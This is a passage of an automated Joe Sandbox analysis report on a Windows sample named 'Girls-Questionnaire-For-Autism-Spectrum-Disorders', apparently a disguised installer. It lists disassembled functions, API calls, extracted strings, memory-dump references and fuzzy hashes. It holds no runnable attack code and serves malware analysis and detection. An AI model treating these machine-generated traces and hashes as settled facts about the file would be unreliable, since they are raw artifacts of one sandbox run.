                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWindow$CloseHandle$AttributesCopyCreateDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                              • String ID: (\m$/SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                              • API String ID: 1779715363-1630723103
                                                                                              • Opcode ID: 26cf6587e7bf8b1553ca1d5cbf9fdcd1103d68e801311e3200c35554a7ed760e
                                                                                              • Instruction ID: ef81c38150d0c0f6437f901880bd06975f11695bff6d213fe2789ed19ae6d402
                                                                                              • Opcode Fuzzy Hash: 26cf6587e7bf8b1553ca1d5cbf9fdcd1103d68e801311e3200c35554a7ed760e
                                                                                              • Instruction Fuzzy Hash: EE4181B1A04208AFDB00EFB5DC56EDE7BF9EB89314F11456AF500F7291DB789A408B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00625FC4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124pipeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,006261A7,?,00000000,00626202,?,?,00000000,00000000), ref: 00626021
                                                                                              • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062607E
                                                                                              • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,0062613C,?,00000000,000000FF,00000000,00000000,00000000,006261A7), ref: 0062608B
                                                                                              • MsgWaitForMultipleObjects.USER32 ref: 006260D7
                                                                                              • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626101
                                                                                              • GetLastError.KERNEL32(?,?,00000000,000000FF,00626115,00000000,00000000), ref: 00626108
                                                                                                • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                              • String ID: CreateEvent$TransactNamedPipe
                                                                                              • API String ID: 2182916169-3012584893
                                                                                              • Opcode ID: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
                                                                                              • Instruction ID: 6106728f610c95dcbec9252819f2c5c1e9fccb50d9899b4423df3e52f48f78ac
                                                                                              • Opcode Fuzzy Hash: a06eff76c2156a534d1e4dc483291fabc8641127e113913af401bd78cfb4e81c
                                                                                              • Instruction Fuzzy Hash: 6441AC70A00618EFDB05DF99DD85EDEBBBAEB08310F1041A9F904E7392D674AE50CB24
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040DF90, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
                                                                                              • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
                                                                                              • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
                                                                                              • IsValidLocale.KERNEL32(00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
                                                                                              • EnterCriticalSection.KERNEL32(006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
                                                                                              • LeaveCriticalSection.KERNEL32(006D1C14,006D1C14,00000000,00000002,006D1C14,006D1C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                              • String ID: en-US,en,
                                                                                              • API String ID: 975949045-3579323720
                                                                                              • Opcode ID: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                                                              • Instruction ID: 7d1429daecdd90a797f7fba0e37e49eac4d41b909b59f49409e6443efac98480
                                                                                              • Opcode Fuzzy Hash: 171b762d311100d548245b05869de6cc58e31fb58a3f3531ab4430e822a5ac23
                                                                                              • Instruction Fuzzy Hash: F7218A60B90614A6DB10B7B78C0265A3245DB46708F51487BB540BF3C7CAFD8D558AAF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005C7FF4, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C801B
                                                                                                • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                              • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C806E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                              • API String ID: 4190037839-2401316094
                                                                                              • Opcode ID: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
                                                                                              • Instruction ID: b59d3067a1cffae51886ca0dc1f1740e66d40653876fb7099798d5cffc045aa9
                                                                                              • Opcode Fuzzy Hash: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
                                                                                              • Instruction Fuzzy Hash: 51214F34A04209AFDB10EAE5CC5AFFE7BE9FB48704F60486DA500F3681EE74AA45C755
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00624BA8, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                                              • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624D58,00000000, /s ",006D579C,regsvr32.exe",?,00624D58), ref: 00624CC6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseDirectoryHandleSystem
                                                                                              • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                              • API String ID: 2051275411-1862435767
                                                                                              • Opcode ID: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                                                              • Instruction ID: 4609d961d1e6a6c9b50d20a9c17260b7e2f4bf46ee5c2bafd069b1c5a14d41a0
                                                                                              • Opcode Fuzzy Hash: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                                                              • Instruction Fuzzy Hash: 0B413F30A0061CABDB10EFE5D892ACDBBBAFF48304F51457EA504B7282DB746A05CF59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004062CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
                                                                                              • GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite
                                                                                              • String ID: <T@
                                                                                              • API String ID: 3320372497-2050694182
                                                                                              • Opcode ID: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                                                              • Instruction ID: ee5667e1a227ecbea5375e2fa2ea65b47cf69c4a4a195d8f09788a9c4629ec5a
                                                                                              • Opcode Fuzzy Hash: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                                                              • Instruction Fuzzy Hash: 5701A9A16046147DE610F3BA9C4AF6B279CCB0976CF10463B7514F61D2C97C9C548B7E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 005B8390, Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCapture.USER32 ref: 005B83B6
                                                                                              • IsWindowUnicode.USER32(00000000), ref: 005B83F9
                                                                                              • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
                                                                                              • SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
                                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
                                                                                              • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                              • String ID:
                                                                                              • API String ID: 1994056952-0
                                                                                              • Opcode ID: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
                                                                                              • Instruction ID: fa2d834c3aada0f77e9407d785ac3e39b975c7e98aa55159218471e4f58a832a
                                                                                              • Opcode Fuzzy Hash: 55dc5321dd5b36b01ea5e2a5a29a5f1f208dbc338f676538c3849fa0211c3caa
                                                                                              • Instruction Fuzzy Hash: 3C21BFB520460A6F9A60EA99CD40EE777DCFF44744B105829B999C3642DE14F840C765
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405F80, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                                                              • Instruction ID: 5d66737b0d4da92f98c0db807105cf356bd4b4b1c4874a50b8b8aa415a59ee3b
                                                                                              • Opcode Fuzzy Hash: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                                                              • Instruction Fuzzy Hash: D1C134A2710A004BD714AB7D9C8476FB286DBC5324F19823FE645EB3D6DA7CCC558B88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 006158C4, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 239windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615941
                                                                                              • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00615968
                                                                                              • SetForegroundWindow.USER32(?,00000000,00615C40,?,00000000,00615C7E), ref: 00615979
                                                                                              • DefWindowProcW.USER32(00000000,?,?,?,00000000,00615C40,?,00000000,00615C7E), ref: 00615C2B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostWindow$ForegroundProc
                                                                                              • String ID: ,hm$Cannot evaluate variable because [Code] isn't running yet
                                                                                              • API String ID: 602442252-4088602279
                                                                                              • Opcode ID: 45c3d4c65d1ec2b60b52e47b4900782b425ab5755711cce607cb4ac74d550e22
                                                                                              • Instruction ID: a4d9e41ba68ff62660f6698438dd6fdd69331843db6522f8d42236939986de27
                                                                                              • Opcode Fuzzy Hash: 45c3d4c65d1ec2b60b52e47b4900782b425ab5755711cce607cb4ac74d550e22
                                                                                              • Instruction Fuzzy Hash: F691BC34A04704EFD711DF69D8A1F99FBB6EB89700F19C4AAF8059B7A1C634AD80CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0060D8B0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D996
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWrite
                                                                                              • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                              • API String ID: 390214022-3304407042
                                                                                              • Opcode ID: 705ed7cc5398cbe28157da632e506f3351768adff860ab0ed1cfb64a8e1f6eff
                                                                                              • Instruction ID: 9ccae61fee5444c96898e798bd08ad00ad1f0a42c005b5ee0ec7678d9f590d11
                                                                                              • Opcode Fuzzy Hash: 705ed7cc5398cbe28157da632e506f3351768adff860ab0ed1cfb64a8e1f6eff
                                                                                              • Instruction Fuzzy Hash: 3E810974A44209AFDB04EBE5C882BDEBBB6EF88304F504669E400B73D1E775AE45CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408E18, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004092D8: GetCurrentThreadId.KERNEL32 ref: 004092DB
                                                                                              • GetTickCount.KERNEL32 ref: 00408E4F
                                                                                              • GetTickCount.KERNEL32 ref: 00408E67
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00408E96
                                                                                              • GetTickCount.KERNEL32 ref: 00408EC1
                                                                                              • GetTickCount.KERNEL32 ref: 00408EF8
                                                                                              • GetTickCount.KERNEL32 ref: 00408F22
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00408F92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
